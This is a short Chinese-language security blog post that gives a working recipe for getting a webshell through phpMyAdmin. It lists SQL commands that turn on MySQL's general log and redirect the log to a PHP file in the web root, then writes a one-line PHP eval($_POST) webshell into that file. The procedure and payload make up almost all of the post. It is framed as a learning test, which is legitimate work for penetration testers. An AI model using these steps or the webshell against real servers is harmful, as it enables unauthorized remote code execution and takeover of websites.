phpmyadmin日志getshell测试

2020-12-22 分类：学习路上作者：微慑管理员阅读(196) 评论(0)

1、登录phpmyadmin

2、查看数据路径，作为猜web路径辅助

select @@datadir;

3、查看日志功能是否开启:

(一般这个日志记录是默认关闭的，需要我们手动开启)

show variables like '%general%';

4、开启日志功能：

SET GLOBAL general_log='on';

5、修改日志路径：

set global general_log_file='D:\\phpStudy\\WWW\\shell.php';

6、执行包含shell的语句即可：

select "<?php eval($_POST['gg']);?>";

7、查看结果：

8、ps：发布文章火绒提示webshell….

拓展阅读(点评/知识)：

参考来源：

https://zhuanlan.zhihu.com/p/144061985

https://www.jianshu.com/p/cd618e8ef007

本文标题：	phpmyadmin日志getshell测试
本文链接： (转载请附上本文链接)	http://vulsee.com/archives/vulsee_2020/1222_13192.html

转载请附本站链接，未经允许不得转载,,谢谢：微慑信息网-VulSee.com » phpmyadmin日志getshell测试

微慑信息网专注工匠精神